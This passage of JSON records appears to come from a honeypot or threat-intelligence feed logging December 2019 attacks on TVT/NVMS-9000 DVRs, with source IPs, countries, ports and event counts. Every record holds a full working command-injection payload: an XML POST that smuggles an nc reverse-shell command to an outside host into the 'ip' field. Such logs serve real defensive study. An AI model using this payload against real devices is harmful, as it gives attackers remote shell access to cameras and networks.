- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8080,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-23T20:34:24Z",
- "last_seen": "2019-12-23T20:34:24Z"
- },
- {
- "source_ip_address": "209.108.207.242",
- "country": "US",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 81,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 4,
- "first_seen": "2019-12-23T20:32:18Z",
- "last_seen": "2019-12-23T20:32:18Z"
- },
- {
- "source_ip_address": "189.34.243.5",
- "country": "BR",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8080,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 3,
- "first_seen": "2019-12-23T20:23:57Z",
- "last_seen": "2019-12-23T20:23:57Z"
- },
- {
- "source_ip_address": "90.52.97.82",
- "country": "FR",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8000,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 23,
- "first_seen": "2019-12-23T20:20:56Z",
- "last_seen": "2019-12-23T20:20:56Z"
- },
- {
- "source_ip_address": "187.172.85.213",
- "country": "MX",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 88,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 3,
- "first_seen": "2019-12-23T20:08:03Z",
- "last_seen": "2019-12-23T20:08:03Z"
- },
- {
- "source_ip_address": "201.103.15.228",
- "country": "MX",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 88,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 19,
- "first_seen": "2019-12-23T19:48:20Z",
- "last_seen": "2019-12-23T19:48:20Z"
- },
- {
- "source_ip_address": "173.12.220.213",
- "country": "US",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 80,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 22,
- "first_seen": "2019-12-23T18:39:19Z",
- "last_seen": "2019-12-23T18:39:19Z"
- },
- {
- "source_ip_address": "186.250.39.82",
- "country": "BR",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 88,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 33,
- "first_seen": "2019-12-23T18:30:08Z",
- "last_seen": "2019-12-23T18:30:08Z"
- },
- {
- "source_ip_address": "75.144.232.165",
- "country": "US",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 81,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 2,
- "first_seen": "2019-12-23T18:08:38Z",
- "last_seen": "2019-12-23T18:08:38Z"
- },
- {
- "source_ip_address": "187.178.71.178",
- "country": "MX",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 88,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 7,
- "first_seen": "2019-12-23T08:17:13Z",
- "last_seen": "2019-12-23T18:07:12Z"
- },
- {
- "source_ip_address": "187.222.77.144",
- "country": "MX",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 88,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-23T17:56:05Z",
- "last_seen": "2019-12-23T17:56:05Z"
- },
- {
- "source_ip_address": "220.134.58.133",
- "country": "TW",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 80,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-23T17:55:39Z",
- "last_seen": "2019-12-23T17:55:39Z"
- },
- {
- "source_ip_address": "93.42.110.44",
- "country": "IT",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8000,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 2,
- "first_seen": "2019-12-19T04:13:44Z",
- "last_seen": "2019-12-23T17:36:46Z"
- },
- {
- "source_ip_address": "220.133.9.103",
- "country": "TW",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 81,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-23T17:24:08Z",
- "last_seen": "2019-12-23T17:24:08Z"
- },
- {
- "source_ip_address": "189.183.200.105",
- "country": "MX",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8000,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-23T16:51:27Z",
- "last_seen": "2019-12-23T16:51:27Z"
- },
- {
- "source_ip_address": "156.213.98.214",
- "country": "EG",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8080,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 3,
- "first_seen": "2019-12-23T16:48:03Z",
- "last_seen": "2019-12-23T16:48:03Z"
- },
- {
- "source_ip_address": "50.111.63.176",
- "country": "US",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 88,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-23T16:06:55Z",
- "last_seen": "2019-12-23T16:06:55Z"
- },
- {
- "source_ip_address": "66.169.87.5",
- "country": "US",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 80,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 5,
- "first_seen": "2019-12-23T03:30:58Z",
- "last_seen": "2019-12-23T15:54:59Z"
- },
- {
- "source_ip_address": "220.133.9.103",
- "country": "TW",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 88,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-23T15:11:23Z",
- "last_seen": "2019-12-23T15:11:23Z"
- },
- {
- "source_ip_address": "45.37.65.216",
- "country": "US",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 81,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 6,
- "first_seen": "2019-12-23T15:07:31Z",
- "last_seen": "2019-12-23T15:07:31Z"
- },
- {
- "source_ip_address": "95.70.169.166",
- "country": "TR",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 80,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 6,
- "first_seen": "2019-12-23T15:04:22Z",
- "last_seen": "2019-12-23T15:04:22Z"
- },
- {
- "source_ip_address": "201.114.222.190",
- "country": "MX",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 80,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 8,
- "first_seen": "2019-12-23T15:00:26Z",
- "last_seen": "2019-12-23T15:00:26Z"
- },
- {
- "source_ip_address": "201.103.15.228",
- "country": "MX",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8000,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 38,
- "first_seen": "2019-12-23T14:55:27Z",
- "last_seen": "2019-12-23T14:55:27Z"
- },
- {
- "source_ip_address": "185.61.137.172",
- "country": "NL",
- "user_agent": "ApiTool",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8080,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 88,
- "first_seen": "2019-12-23T14:28:07Z",
- "last_seen": "2019-12-23T14:49:39Z"
- },
- {
- "source_ip_address": "116.48.140.149",
- "country": "HK",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 80,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-23T14:37:35Z",
- "last_seen": "2019-12-23T14:37:35Z"
- },
- {
- "source_ip_address": "180.177.76.85",
- "country": "TW",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8080,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-23T14:27:25Z",
- "last_seen": "2019-12-23T14:27:25Z"
- },
- {
- "source_ip_address": "60.51.60.52",
- "country": "MY",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 88,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 142,
- "first_seen": "2019-12-22T06:51:02Z",
- "last_seen": "2019-12-23T14:25:23Z"
- },
- {
- "source_ip_address": "42.189.61.175",
- "country": "MY",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
